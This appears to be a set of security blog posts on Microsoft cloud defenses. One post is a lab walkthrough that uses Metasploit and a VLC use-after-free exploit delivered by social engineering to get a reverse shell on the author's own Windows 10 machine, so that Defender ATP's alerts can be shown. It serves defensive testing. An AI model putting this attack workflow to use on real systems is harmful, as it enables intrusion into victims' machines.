Go, hack yourself!

While talking about the protection mechanisms in modern cloud environments, one tends to forget the other side.

You must know your enemy in order to fight him successfully. Today we will build a lab to attack a modern Microsoft cloud environment that is protected by the brightest star on Microsoft’s security sky: Microsoft Defender ATP*.

*Windows Defender ATP was recently renamed to Microsoft Defender ATP, since it now also supports some functionality on MacOS (and more is planned)

But first, lets move to the dark side. I am sure you already heard of many of the tools used by attackers today, but have you ever used them to attack your own machines? Let’s see how that works!

Our lab is simple:

  • 1 x Windows 10 1809, AAD joined, Intune managed, Microsoft Defender ATP secured, 100 % Cloud
  • 1 x Kali Linux with Metasploit

In case you don’t know it, Kali Linux is a Linux distribution that comes with many important attacking and penetration testing tools. Metasploit is a framework for the complete kill-chain.

A kill-chain?

A kill-chain describes the process from the first contact of the attacker to the ‘promised land’ (whatever they are gaining to obtain).

1-1Pic01: kill chain

Attack vectors are the first contact the attacker has with your property: He leaves a prepared USB stick on your company parking, he writes an Email with an attachment or with a link to your users, or he attacks you e.g. with a password spray attack.

In former times then, when he accessed ‘Patient 0’, the first computer: he was in. ‘In’ meant your managed environment, behind your firewalls. Now, in modern concepts, there is no ‘in’ or ‘out’ anymore. Clients are built to be always in an open network. This is, what makes one of the next steps harder: lateral movement. Hopping from one computer to the next was easier in former times, since everything inside the perimeter was considered as ‘safe’. (Is this still the case in your environment? Go 100% cloud!)

To move laterally, the attacker would try to gain more permissions (admin etc.) and gather more information about your network and directory (e.g. Global Address List discovery).

Now, let’s start with the fun part of this post. On the left you can see the Metasploit console, on the right, you see our Windows 10 client:

2Pic02: our setup

First, we must choose an exploit we can use on the Windows machine. I have chosen exploit-db.com to find the appropriate exploit. I have then decided to take an exploit in a popular video player software, VLC:

3Pic03: choose an exploit

This exploit is a so called ‘use after free’ exploit that tries to use memory that was just freed from the application.

Many exploits are already integrated in the Metasploit database, however, ‘my’ exploit wasn’t. The VLC exploit is quite new. Exploit-db.com gives you the possibility to download the exploit, so that you can use it in Metasploit. After download, you just tell Metasploit to use it:

4
Pic04: use the exploit

With ‘show payloads’, you can examine the possible payloads of this exploit. When you read the description of the exploit, you see that the author of the exploit recommends to only use certain payloads with the exploit since others (e.g. the meterpreter payload) crashes the application:

5Pic05: show payloads

With show options you can see what options are necessary to configure the exploit:

6Pic06: show options

In the options above, we see, that the exploit will generate two MKV (video) files. The first has to be opened by the victim (the second has to reside in the same directory). We also see, what settings are already set or still empty. The only setting that is missing here is ‘LHOST’, the IP address of our attacking machine. So let’s set it:

7Pic07: set LHOST

That’s it, we are ready to run the exploit:

8Pic08: run the exploit

As expected, Metasploit has generated the two .mkv files for us:

9Pic09: here we go

Now, when we remind ourselves on the kill-chain diagram at the beginning, we need an attack vector. How do we distribute the .mkv files to the victim? Well, that is pretty easy, we can zip it and send it by Email or – that’s what I did-, we can put it on Dropbox and share it with the user. If you attach it with a ‘social-engineering made up’ text, you can make sure that it is being watched, or better: ‘double-clicked’. (I just had to convince myself).

The .mkv files are on the client now. In the meanwhile, we need to setup a ‘Listener’ on our attacking machine that waits for the victim to double-click on the .mkv file. I have decided to create a reverse shell handler (which is also the default payload option for the exploit):

10Pic10: setup the listener

When you observe the above screenshot, you see that we ‘use’ an exploit again, in this case for the listener “exploit/multi/handler”, we then set the payload and the ‘LHOST’ IP and are then ready to exploit (run) it:

11Pic11: start the listener

The listener is now doing what it should: listening. I now went on the Windows 10 machine and double-clicked the first .mkv file. After a few seconds, I started to receive some data on the listener and finally got a Windows command prompt on my Kali Linux machine!

And what do you do, when you have a command prompt on a unknown Windows machine? Exactly, I did a ‘DIR’:

12Pic12: orientation

Ok, that was a hesitantly first try – I must admit that, let’s get gutsy and start something:

Pic13: finally got some help with mental math (click to enlarge)

Pretty cool, isn’t it? Meanwhile on the good side of the planet, Microsoft Defender ATP started sending me first Alerts:

14Pic14: ooh

In the artifact timeline we can see which application triggered the alert:

15Pic15: artifact timeline

Uh-huh, VLC seams to make some bad stuff on one of the Windows clients in my environment 😊 As we can see in the process tree, ATP has exactly found what our exploit was doing, it started allocating some free memory (like in the exploit description: ‘use after free’):

16Pic16: process tree

Anyway, lets try to get a step further. I am trying now to upgrade the remote shell session to a meterpreter session. With meterpreter we have more possibilities. You can easily run a keylogger, Mimikatz or much more. To upgrade to meterpreter, we have to put the remote session into a background session by pressing ctrl+Z. Then we use the exploit “shell_to_meterpreter”:

17Pic17: trying to start a meterpreter session

With ‘sessions’ we can see the current remote shell session. We set the exploit to session 1 to tell the shell_to_meterpreter exploit to use our remote shell session to upgrade, then we run the exploit:

18Pic18: not working somehow

With that, ATP freaked out:

19Pic19: new alerts in ATP (1)

And:

20Pic20: new alerts in ATP (2)

And we didn’t get any new (meterpreter) session, but still have just the remote shell session:

21Pic21: no new session

What happened? As we can see in the ATP machine timeline, it was ATP’s friend Windows Defender Antivirus that remediated our attempt to attack the machine with the meterpreter payload:

22Pic22: friends will be friends (Windows Defender Antivir did the job)

Which is good or bad, depending on the perspective. Let’s take a look on the complete alert history:

23Pic23: Alerts queue

What scared me a little here is the fact that all these alerts had an assigned severity of “medium”. So, you really must look into your medium alerts!

Windows Defender and Microsoft Defender ATP worked hand in hand in my scenario. However, I had access to the targeted machine and could execute arbitrary code (calc.exe). ATP recognized that – which is good, but wouldn’t it be even better if we could get a hint upfront?

Microsoft Defender ATP Threat and Vulnerability Management

Microsoft is currently rolling out this new feature to tenants worldwide. With TVM, ATP gathers information about the applications on your clients, the installed versions and the configuration. This data is then compared with Microsoft’s Threat Intelligence. That’s why ATP could already tell me before my Windows 10 machine was attacked that it has a vulnerability in an application called “VLC”:

24
Pic24: we could have known before

ATP even tells me which vulnerabilities are associated with the installed version of VLC:

25Pic25: CVEs associated with the software version

You might have recognized that our CVE is (the second) is listed. When we click on this CVE, we get a description that is quite similar to the description on exploit-db.com:

26Pic26: CVE details

Conclusion

I have just scratched the surface. After I had access to the target machine and was able to execute calc.exe, I gave up quite early when the meterpreter session couldn’t be established. There are many possibilities to obfuscate the payload to make it harder to be recognized. The fact that ATP noticed that the VLC exploit allocated just freed memory shows the real power of the tool, the power of behavioral analysis.

Threat & Vulnerability Management completes Microsoft Defender ATP. It gives you a vulnerability-based view on the application landscape of your environment and gives you prioritized advices on how to get rid of the vulnerabilities before it gets actively exploited.

However, to be able to judge the importance of tools like Microsoft Defender ATP, you must betake yourself to the red-team’s point of view. If you try to think like an attacker, you will be better able to understand how to protect your environment. So … go, hack yourself!

Office ATP P2

Since the beginning of February 2019, Microsoft is dividing Office ATP features into P1 and P2. Everything that was called “Threat Intelligence” before goes now into Office ATP P2. In this article, I give a brief overview of Office ATP P1 and P2 features and go deep into an exciting P2 feature called “Attack Simulator”.

But let’s start with P1. To be honest, I was underestimating the value of Office ATP for a while. But in the meanwhile (while I was not watching), Microsoft added more and more functionality to mitigate the most common attack vectors:

  • Email
    • Links in Body & Attachments (Fat Client & OWA)
  • Links in Documents
    • Office on Windows, iOS, Android
    • Links in Team Conversations
  • Files in
    • OneDrive
    • SharePoint
    • Teams

So, you say, you have Exchange Online and SharePoint Online and those services are using Anti-Virus anyway, so why would you need Office ATP?

ATP goes a step further: Whenever you read “link” in the above bullet list, Office ATP is replacing this “link” with a link that is pointing to Microsoft servers. That means, when your users click on this link to e.g. download a file, this file goes through all the Office ATP intelligence. So even if the link was Ok during e.g. delivery of the Email but the attackers changed the document on the server-side in the meanwhile (and after the initial scan), Office ATP will recognize that. This is called: Safe Links.

With Safe Attachments on the other hand, Microsoft is even detonating your attachments! They will take the attachment to a virtual environment and watch how it behaves in order to decide if it is malicious.

How this looks like for example in Teams was recently described by ‘Matt Soseman’: https://blogs.technet.microsoft.com/skypehybridguy/2019/02/18/microsoft-teams-protect-against-phishing-malware/

Looking deeper into P1 features

The services improved over time. E.g. with “native link rendering” Microsoft displays the original link in the hover-window instead of the Safe-Link to not confuse users:


Pic01: hover text

You must look into the status bar in order to see the “real” URL:


Pic02: Status bar

Of course, all those techniques are not the holy grail. As always: somebody finds an exploit (e.g. “baseStriker” in Safe Links) and Microsoft closes that gap afterwards.

It is also important to note that not all content on SharePoint goes through Office ATP. Instead ATP is using a smart algorithm that takes guest and sharing activity under consideration. So, whenever there is “external” activity with files, it will act.

Now, lets shift gears and talk about Office ATP P2 features

There are several features available here: with ‘threat tracker’ you get informed about the latest threats and their details. On the ‘threat dashboard’ you get reports about malware, spam and phishing happened in your tenant. With ‘Explorer’ you get a powerful tool to hunt for threats in your environment.

You can integrate Windows Defender ATP here to find out to which machines a certain Email was delivered.

But let’s now come to the feature we will look closer at: Attack Simulator

Next to ‘Safe Links’ and ‘Safe Attachments’, making users aware of not clicking on a link from a suspicious looking Email and not opening that attachment is maybe the most important mitigation. Office ATP P2 helps you with Attack Simulator to increase awareness at your users. You have three ‘attack campaigns’ (more to come):

  • Spear Phishing
  • Brute Force
  • Password Spray

Let’s start a Spear Phishing Attack:

With this Spear Phishing Attack, we try to ‘steal’ credentials from the user by placing a link into an Email that we send and make them to click on the link and provide their credentials.


Pic03: Launch Attack

Provide a name:


Pic04: Give it a name

Select people from your organization (you cannot use this against external users):


Pic05: Specify your targeted users

Provide Display-Name and From Email Address. This is what your targeted users will see in their Email clients. You can choose Login Server URL from a dropdown list. Microsoft will monitor logins to these pages for you and report on it. You can also configure (optionally) a custom landing page. This page will be displayed, after the user logs in. Finally, specify a Subject:


Pic06: Provide Details of the attack

Don’t be afraid: Microsoft does not track the credentials your users provide, nor do they check if they are correct (I never put in the real passwords in my tests and always was passed through to the landing page).

Then we have an Email Body Editor including a HTML source code editor. There are two variables you can use in the HTML body:

  • ${username}
  • ${loginserverurl}


Pic07: compose your poisoned Email

Together with the source code editor we can create a hyperlink in the Email, that does not make the original URL visible at the first glance (as you can see above):


Pic08: HTML view on the mail

That’s it, you get the final question if you really want to proceed. If you say ‘finish’ the attack fires:


Pic09: fire your attack

Now let’s see how this looks on the user’s side (here in OWA):


Pic10: user’s view in their inbox

When the user clicks on the mail she gets prompted by the well known Microsoft login dialogue (notice that chrome already thinks this is a ‘not secure’ site):


Pic11: user gets prompted

Whatever credentials you provide, you get forwarded to the specified landing page:


Pic12: Custom landing page

Back in Attack Simulator you can look on the report of your attack:


Pic13: Report of the attack results

As you can see, we targeted one user with our attack and had one successful attempt (well, I would say it was not successful, because the user clicked on the link, but that’s another story). You can download a CSV of all users and the description of their behavior.

The other available attacks run real password attacks against your user accounts. Either you provide a password list and see if those passwords are used by the users targeted (Brute Force) or you specify just one password and use it against a broader scope of users (Spray Attack). You then get a similar report as we have already shown:


Pic14: Report of BruteForce attack / Spray attack

Conclusion / A word of caution

I really like the attack simulator. With the available attack types, you can challenge your users and that means you make your environment more secure. But you must handle it with care. You should plan your ‘attacks’ very good and inform instances like ‘workers council’ and ‘data protection’ (and the management). Then I would suggest that you start a campaign for more security. Maybe you launch a specific website with tips and videos to improve user’s behaviors. Then during this campaign, you mention somewhere in your user communication, that you might also challenge them – so you warn them a little bit. Then, when they get ‚caught‘ don’t be mad at them. Explain carefully what happen and how they can improve. Your users are your friends 🙂

When it comes to Safe Links and Safe Attachments, you can easily roll this out in a scoped manner. Just increase the number of targeted users by time. So, you get a good impression of the impact it has.

AI, Protect Me!

Azure AD Identity Protection (IP) recently got a refresh (in preview). We will have a look into some of the enhancements. But first, I will give you a brief overview of what is it all about:

In a nutshell, IP handles two kind of things:

  • Risky Sign-Ins
    • Is the authentication request really coming from the authorized user?
    • Can be triggered by:
      • Atypical travel (10 PM: Sign-in from New York, 10:30 PM Sign-in from Frankfurt)
      • Anonymous IP Address (e.g. Tor Browser)
      • Unfamiliar Sign-In properties (Takes past sign-ins into consideration and checks for regular used devices, locations and networks to compare it with the current sign-in)
      • Malware linked IP address (Microsoft researches IP addresses that are associated with malware)
  • Risky Users
    • Either a former Sign-In was risky (see above)
    • Or Credentials have been leaked and Microsoft found them on any dark web marketplace or so.

The calculation of the Sign-In and User Risks is done by the help of machine learning.

Keep in mind that all machine learning technologies need learning periods. E.g. ‘Atypical travel’ needs like 14 days or 10 logins to learn the users sign-in behavior. ‘Unfamiliar sign-in’ whereas needs 30 days, during which it is passive. (see here for more info)

You then can create policies based on Risky Sign-Ins or Risky Users. In case of Risky Sign-Ins, you can challenge users for MFA, in case of Risky Users, you can prompt users for a password change (hopefully through SSPR) or you can block access in both cases.

That’s pretty much the basic functionality of Azure AD Identity Protection, except for one thing, we didn’t talk about yet:

Reporting

This is where the freshness comes in. Microsoft is investing a lot of effort into a clean overview to make it easy for the security administrator to see at one glance what is going on. In order to see how well reporting is in IP, we need to setup the risk policies and then produce some Risky Sign-Ins first.

Setup of Risk Policies

1

Pic1: IP Policies

Both, User and Sign-in risk policies consist of

  • User Scope (who will be effected by this policy)
  • Conditions (Low, Medium or High Risk)
  • Controls

Pic2: Policy Controls

Now that the policies for Sign-in Risk and User Risk have been setup and assigned to the users, let’s play around with it:

We sign-in to Office 365 via a TOR Browser to anonymize our IP address:

3

Pic3: Tor Browser

Shortly after we get a new risk as you can see in the brand-new risky users report:

4

Pic4: Risky users

As you can see, we tried to login to Office 365 and didn’t succeed. The location is also interesting, you can see, the sign-in happened somewhere from Italy (while I am living in Germany) – this is since TOR is proxying all requests to other nodes in other countries.

In the ‘Basic Info’ tab, you get user info from Azure AD. ‘Risk events not linked to a sign-in’ is also interesting: Microsoft is continuously screening leaked credentials on dark places in the internet. So, if your credentials are sold anywhere out there, a risk is listed under ‘Risk events not linked to a sign-in’.

Until now, we do not know about the actual reason for the risk. Let’s click on the risky sign-in to get to the risky sign-in report:

5

Pic5: Risky sign-ins

Here we have it: ‘Anonymous IP address’ was (as expected) the reason for the risk.

Now, your investigation as a security administrator starts. You will have to check with this user if she used a TOR browser by intention or if somebody else tried to logon with her credentials. After you found out, you can click on ‘confirm compromised’ or ‘confirm safe’. This will a) put the user on high risk if she was really compromised and b) help machine learning, well …, to learn.

Microsoft calls this “Smart Feedback” and this is also brand new (in preview).

This was an easy case (user connected by Tor Browser), as mentioned, your work starts after the risk was detected. You must investigate what’s really going on. So, what you need are really good and clean reports that you can filter, sort and customize. With this refresh of Identity Protection, the Risk reports have been enhanced a lot to support you in your daily job.

A word of caution: to test the policies easily, I set the condition to “low risk and above” and the scope to my “all users” group. After hitting OK, I immediately received this one here below and couldn’t work with the portal anymore. I then had to re-authenticate and … was prompted to authenticate and then to change my admin password. As you can see, those risk policies are really working

6

Pic6: I am out!

So, be sure whom you assign those policies and have a Break-Glass Admin Account (thankfully I had) that you always exclude from all policies (also in conditional access).

But that’s not all

This risk report data is also available via Graph API. Let’s have a look how that is working. We will use Graph Explorer to show which information we can get also programmatically:

https://developer.microsoft.com/en-us/graph/graph-explorer

You might have to give yourself the appropriate permission, if you see this:

6-s1

You will need:

6-s2

Make sure you are logged in to graph explorer and use the new beta API, then try for example “identityRiskEvents”:

7

Pic7: Graph explorer

When I do that, I see the same sign-in risk we saw earlier in the GUI:

8

Pic8: Graph response

As you can see, you even get some extra information, like the geographical data of the IP location.

Christmas Special: Peace between Security and Usability (by the example of Multifactor Authentication in Azure AD)

One of the biggest problems of our times in IT is to pacify the long-lasting war between security and usability. We all know this picture here below that shows precisely human behavior: people will accept security, when its easy enough. Otherwise they will find their own way around security:

1

Pic1: The easy way

For me, this leads to the conclusion that a security design of a system is only a good security design (yes, also from security perspective, not only from user perspective!) when it allows people to behave naturally.

Some people in charge of IT security, design secure systems for the sake of security – not thinking about the users. They think it is more important to have a secure design in place and users will somehow handle it. They are not yet aware of the fact that people should be an important part within their designs, since they can circumvent whatever they designed.

Users will always ‘win’. At the end, the often mentioned ‘young talents’ (and I think also the older ones) search other employers, when they are annoyed by too many virtual walls around them.

We somehow must marry security & usability in order to improve both.

One of the best examples of such a marriage is Microsoft’s implementation of multifactor authentication (MFA) in conjunction with conditional access:

When you require MFA for users that join a Windows 10 device to Azure AD:

2

Pic2: Require MFA for AAD join

Then, when you setup a new device, after you authenticate during OOBE …

3

Pic3: OOBE prompts for company credentials

… you get prompted for MFA:

4

Pic4: MFA Prompt

In this scenario, I have disabled Windows Hello for Business (WHfB) to proof something, I will come back on later. Here is where you can enable and disable WHfB:

5-2

Pic5: Where you disable WHfB for test purposes

So, after OOBE went through (I did not receive a prompt to setup WHfB during Windows installation as expected), I log in to windows and could open Edge and connect to outlook.office365.com without an MFA prompt:

5

Pic6: Login to OWA without MFA prompt

The question is why? Lets take a look in the AAD sign-ins:

6

Pic7: Azure AD Sign-Ins

As we can see, the ‘MFA Result’ states that “MFA requirement (is) satisfied by claim in the token”.

Now lets log-in from a different computer that is not AAD joined (or use a private browser session):

8

Pic8: MFA prompt from not AAD joined pc (in german)

Here we get a MFA prompt, since Conditional Access is configured as follows:

9

Pic9: MFA enforced through conditional access

As you can see, under all circumstances, we force MFA here for Exchange (you have to believe me the latter ).

Before we answer the question, why didn’t I get prompted in the first place, when I logged in from a AAD joined computer, we will take a look at a second scenario:

Registered Device (Workplace Joined, local Workgroup):

After the installation of a ‘stand alone Windows 10’, I had to do MFA to connect to OWA (as expected):

10

Pic10: connect to OWA from stand-alone machine

11

Pic11: MFA prompt on stand-alone machine

Then I registered the device in AAD:

12

Pic12: register device in AAD

Again, I had to use MFA in order to register the device:

13

Pic13: MFA prompt when registering device in AAD

After successfully registering the device (incl. MFA), I was able to access outlook.office365.com without any further MFA prompts.

Again, in the sign-ins, you can see that MFA was satisfied through a claim in the token:

14

Pic14: MFA requirement satisfied from registered device

So, again, why don’t we see MFA prompts from registered and AAD joined devices? The answer can be found on a Microsoft FAQ page:

Q: Why do some of my users do not get MFA prompts on Azure AD joined devices?

A: If user joins or registers a device with Azure AD using multi-factor auth, the device itself will become a trusted second factor for that particular user. Subsequently, whenever the same user signs in to the device and accesses an application, Azure AD considers the device as a second factor and enables that user to seamlessly access their applications without additional MFA prompts. This behavior is not applicable to any other user signing into that device, so all other users accessing that device would still be prompted with an MFA challenge before accessing applications that require MFA.

(https://docs.microsoft.com/en-us/azure/active-directory/devices/faq)

In addition: Microsoft is considering the device also as a second factor, when enrolling the device (AAD Joined) for Windows Hello for Business (without the MFA requirement during setup!). After WHfB enrollment, you are also not prompted again for MFA furthermore.

Conclusion

Imagine a scenario where a user sits in a train and logs in to Windows in order to read her mail. Let’s ignore WHfB for a moment. She types in her username and her password and does not get prompted for MFA, since she works from a trusted (AAD joined or registered) device. A rude woman behind her watches her when she types in username and password. The rude woman than will be very disappointed at home, when she tries to login to Office 365 with the credentials of her victim and then gets prompted for MFA (especially because she hasn’t seen her victim having to do the same).

The beauty of Microsoft’s implementation of multifactor authentication gets visible, when you get NOT prompted for additional authentication methods. Security can show its strength, when usability does not suffer by it.

Garage: Azure AD Terms of Use for B2B and AIP

As already mentioned, this blog will have detailed (long) posts and also shorter ones that have a “garage-character” that documents features and solutions I evaluate. This is the first post of this ‘garage’ category.

To be honest, I believe this whole “terms of use” thing was triggered by this guy here. Oliver and myself were in a project at a customer that wanted this functionality that users would have to accept some sort of terms of use before proceeding with a service. (of course we were not the only one requesting this feature, but he was the first chatting about this with the Intune product group). You can like this feature or not and you can also doubt it’s value in a modern IT world, but sometimes it makes things easier (especially in bureaucratic Germany) and you don’t want to fight each fight.

Anyway: Microsoft has started to expand this functionality. You can now set to have users to accept terms of use (TOU) on each device and you can even expire this setting so that they have to re-accept it after a certain period of time.

Then it also gets expanded to other services (currently in public preview):

  • Intune Enrollment
  • B2B Users
  • AIP Documents

Let’s take a closer look on these use cases:

In all cases, you would create a conditional access policy that requests from the given users to accept the terms of use of your company. In this policy, we will combine the requirements for B2B users, Intune enrollment and for AIP users. So we need to select “all guest users” for the B2B scenario and then specific users (Hedi) for the AIP and Intune demo (in real world, you would probably select ‘all users’ here):

1

Next, you select the AIP cloud app and the Intune enrollment cloud app to indicate that those apps should bring up the terms of use when accessed:

2

Here you go: on the access controls you then have the control “all users terms of use” (which is the name of the terms of use I created). Select it and enable the policy:

3

If you now share a document with a guest user via email …

4

… this guest user gets a prompt to accept the terms of use, when opening the document you shared (as you can see it is adopting to your language :-)):

9

If you send someone a AIP protected document (you don’t have to send it by mail, the ‘terms of use’ is triggerd when you authenticate against AAD, since the conditional access policy fires then) …

8

… the recipient then also has to accept the terms of conditions, when opening the document:

76

Conclusion

The more granular it gets the better. So you prompt your users only to accept the terms of use if it is absolutly necessary without annoying them.

100% Cloud will never happen!

I like the idea of starting a brand-new blog site by the name of “Empty Datacenter – 100% Cloud” and then writing the first article, indicating that this will never happen.

But this is exactly what happens during the ‘cloud familiarization period’. The WHAT? Exactly.

During my journey from an on-premises driven consultant for Exchange & Active Directory Enterprise Infrastructures to a Cloud Architect focusing on Office 365, Azure AD and Enterprise Mobility, I noticed by my own thoughts and behaviors and by those of my colleagues and customers that “being cloud minded” is not of a binary category.

Most people understand a few core principles of what it means to be 100% cloud minded. So, in my experience, the 100% cloud approach gets deeper and deeper into one’s mind over time.

People (we all) need time to get used to new environments, paradigms and so on. This is what I call the ‘cloud familiarization period’ (and to be honest, I think this period never ends).

In the beginning of this period, it can happen, that an IT colleague is totally familiar with the benefits of Office 365, completely convinced to move all company mailboxes to the cloud and believes in the future of Microsoft Teams. But if you dig deeper, this IT guy does not really believe in the near end of ‘the fileserver’. He neither believes in empty datacenter halls because ‘our SAP* servers will never go to the cloud during my career’ (* it does not have to be SAP, but you get the idea).

So, in my opinion, when talking about 100% cloud, you should have an empty datacenter as a vision in mind. That means, after moving all the Microsoft Infrastructure to the cloud, your IT infrastructure could look like this:

pic1-1

Pic1

The main message of this picture is: move as much to the cloud as possible now and consider the rest (your on-prem DC) also as a cloud. But let’s proceed step by step.

First, to move the “basic” Microsoft environment means to move:

Mail & File

pic1-2

Pic2

  • Local Mail to Exchange Online
    • Considered as a no-brainer
  • User file servers to ‘SharePoint’
    • With the term “user file servers”, I want to exclude data that is still processed from local apps and so on. To move everything from local fileservers (and SharePoint servers) to OneDrive, Teams, SharePoint Online (and Groups) is technically not hard, but you must work hard regarding change management and user adoption.
  • Comment on Teams
    • As we all know, Teams is the successor of Skype for Business. It is quite easy to use Teams for chat, group-chat, audio calls and conferences. It’s getting a bit harder, if you also move the telephony services to Teams, at least in an enterprise environment. Using which feature by which tool must be well thought through.

The Client

Then, following up with the 100% cloud approach, you should move your clients to the cloud:

pic1-3

Pic3

So, how does this look like from a user perspective? The user receives a new laptop at his desk in the office or at home or where ever you want. He unpacks and starts it and runs into the Out-of-box-experience (OOBE). He types in Username & Password and joins automatically the AAD. The device gets then enrolled into Intune and policy settings are then applied. Intune also installs all user-specific software on the box and after a while, the user can log on to his new machine without IT even touched it. And the best: no on-premises management service was involved. All client management (AAD & Intune etc.) itself is evergreen.

This client loves the freedom of the internet, calls the cloud his home and hates boundaries like Proxy Servers and Firewalls.

Users, on the other hand, love this new client, since it supports collaboration instead of preventing it.

For this new freedom, we need new security concepts. Security concepts that have the global collaboration needs of the users in mind, that also let the users use the tools they need and give them more self-services possibilities to enable them to act fast. With those new security approaches, we also get the chance to improve the overall security of our systems, because we can leverage intelligent cloud solutions that “know” not only our system, but many Microsoft environments from customers all over the world.

The following picture describes the difference between the old and the new security approach:

pic1-4

Pic4

So, in the new world, we must go away from the perimeter approach towards an entity security approach. Considering certain networks as trust worthier than others does not work in a mobile world where computers bypass the company borders in the pockets of their employees.

When we start to protect all entities in question (Identity, Device, Services, Documents), than we gain both: more security and more mobility.

Microsoft offers here an “defense-in-depth product catalogue”, all hosted or connected in/to the cloud:

  • Identity Security
    • MFA
    • Identity Protection
    • Privileged Identity Management
    • RBAC
    • Monitoring/Auditing/Reporting
  • Device Security
    • Secure Boot & Integrity
    • Bitlocker Harddisk encryption
    • Evergreen patching
    • Hello for Business & Passwordless Sign-Ins
    • Endpoint Protection with Windows Defender
    • Advanced Threat Protection
    • Credential & Exploit Guard
  • Service Security
    • Conditional Access & Compliance
    • Device Health Attestation
  • Document Security
    • Azure Information Protection
    • DLP

By now, we were talking about the “company managed (Win 10) client”. In a 100% cloud approach, we also have to think about connecting other devices, mobile devices and private computers (Windows, Mac & maybe even Linux).

In the upcoming posts we will hear more about the mentioned security solutions and the possibilities for mobile and private devices and we dig deeper into them.

The last boxes in the basement

Now, let’s talk about the apps and services we avoided to talk about until now. There are hundreds of applications in your server rooms besides “Mail”, ” File” and “Collaboration/Communication” services.

A 100% Cloud approach means to move them to the cloud. It’s as simple as that.

This is where the “never gonna happen” mantra starts. And therefore, you must keep your clear vision of a cloud-only IT AND be as pragmatic as necessary. Start a project that goes through all your applications and checks them against a priority list like this one:

  • Do we still need this? (I have seen companies that saved a lot of money by asking this simple question)
  • Is there a SaaS service available for this application?
  • Can we move it to Azure (IaaS)?
  • Can we easily ‘publish’ it by Web Application Proxy? (since it speaks http)
  • Do we have to App-vpn to it?

Taking this list and going through all the apps in the basement, we sometimes call “app feng-shui”.

This list is a priority list from top to bottom and it is not complete, but you can imagine what to do here. The benchmark here is “user experience”. In a 100% cloud approach, you should provide the best possible user experience, regardless of the location of the device connecting to your services, no matter where servers reside, it runs on.

You may have recognized that the ‘last boxes in the basement’ struggle against the 100% cloud approach. But this is not so important. And it should not lead you to the conclusion not to start with it at all!

In fact, this is the point! You must do here, what you can to get as close to the 100% as you could. In addition to “app feng-shui” you should also plan on how to proceed with those apps in one year and later. Maybe you get new possibilities then, since a SaaS version is already under development.

Summary

So, that’s it. Your datacenter is (nearly) empty now. As mentioned before, we will dig deeper into many areas mentioned in this blog post in upcoming posts.

I would like to end this post with a list of things you can achieve for you and your company by going 100% cloud:

  • Mobility: from each device and location
  • Evergreen: always up-to-date, for security and for the latest tools and features
  • Collaboration: enable your users to collaborate easily with whom they want without having to use Shadow IT tools
  • Self-services: freedom and agility to the user
  • State of the art security: prepared for modern threats by leveraging cloud intelligence
  • Knowledge sharing: users will be able to share knowledge with community tools.

Is all this easy to achieve? No. Does your company need to change in every cell of its ‘body’? Yes, but I believe it is worth it.

I am really looking forward providing articles here that help you to empty your datacenters and taking full advantage of the 100% cloud approach.